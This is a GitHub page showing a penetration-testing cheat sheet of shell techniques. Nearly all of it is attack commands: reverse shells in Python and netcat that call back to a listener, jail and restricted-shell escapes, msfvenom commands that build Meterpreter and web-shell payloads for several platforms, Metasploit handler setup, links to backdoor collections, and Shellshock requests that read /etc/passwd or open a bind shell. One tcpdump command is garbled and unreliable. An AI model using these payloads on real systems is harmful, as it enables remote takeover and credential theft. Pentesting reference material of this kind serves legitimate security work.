-
Notifications
You must be signed in to change notification settings - Fork 1.2k
/
Cheatsheet_Shells.txt
147 lines (101 loc) · 5.81 KB
/
Cheatsheet_Shells.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
Netcat Shell Listener
`nc -nlvp 4444`
Spawning a TTY Shell - Break out of Jail or limited shell
You should almost always upgrade your shell after taking control of an apache or www user.
(For example when you encounter an error message when trying to run an exploit sh: no job control in this shell )
(hint: sudo -l to see what you can run)
You may encounter limited shells that use rbash and only allow you to execute a single command per session.
You can overcome this by executing an SSH shell to your localhost:
ssh user@$ip nc $localip 4444 -e /bin/sh
enter user's password
python -c 'import pty; pty.spawn("/bin/sh")'
export TERM=linux
`python -c 'import pty; pty.spawn("/bin/sh")'`
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM); s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\["/bin/sh","-i"\]);'
`echo os.system('/bin/bash')`
`/bin/sh -i`
`perl 'exec "/bin/sh";'`
perl: `exec "/bin/sh";`
ruby: `exec "/bin/sh"`
lua: `os.execute('/bin/sh')`
From within IRB: `exec "/bin/sh"`
From within vi: `:!bash`
or
`:set shell=/bin/bash:shell`
From within vim `':!bash':`
From within nmap: `!sh`
From within tcpdump
echo id\\n/bin/netcat $ip 443 “e /bin/bash’ > /tmp/.test chmod +x /tmp/.test sudo tcpdump ln I eth- -w /dev/null W 1 G 1 z /tmp/.tst Z root
From busybox `/bin/busybox telnetd -|/bin/sh -p9999`
Pen test monkey PHP reverse shell
http://pentestmonkey.net/tools/web-shells/php-reverse-shel
php-findsock-shell - turns PHP port 80 into an interactive shell
http://pentestmonkey.net/tools/web-shells/php-findsock-shell
Perl Reverse Shell
http://pentestmonkey.net/tools/web-shells/perl-reverse-shell
PHP powered web browser Shell b374k with file upload etc.
https://github.com/b374k/b374k
Windows reverse shell - PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell
https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1
Web Backdoors from Fuzzdb
https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors
Creating Meterpreter Shells with MSFVenom - http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-msfvenom-payloads/
*Linux*
`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf`
*Windows*
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe`
*Mac*
`msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho`
**Web Payloads**
*PHP*
`msfvenom -p php/reverse_php LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php`
OR
`msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php`
Then we need to add the <?php at the first line of the file so that it will execute as a PHP webpage:
`cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php`
*ASP*
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp`
*JSP*
`msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp`
*WAR*
`msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war`
**Scripting Payloads**
*Python*
`msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py`
*Bash*
`msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh`
*Perl*
`msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl`
**Shellcode**
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
*Linux Based Shellcode*
`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>`
*Windows Based Shellcode*
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>`
*Mac Based Shellcode*
`msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>`
**Handlers**
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘
- SSH to Meterpreter: https://daemonchild.com/2015/08/10/got-ssh-creds-want-meterpreter-try-this/
use auxiliary/scanner/ssh/ssh_login
use post/multi/manage/shell_to_meterpreter
Shellshock
Testing for shell shock with NMap
`root@kali:~/Documents# nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/admin.cgi $ip`
git clone https://github.com/nccgroup/shocker
`./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose`
Shell Shock SSH Forced Command
Check for forced command by enabling all debug output with ssh
ssh -vvv
ssh -i noob noob@$ip '() { :;}; /bin/bash'
cat file (view file contents)
echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; echo \\$(</etc/passwd)\\r\\nHost:vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80
Shell Shock run bind shell
echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; /usr/bin/nc -l -p 9999 -e /bin/sh\\r\\nHost:vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80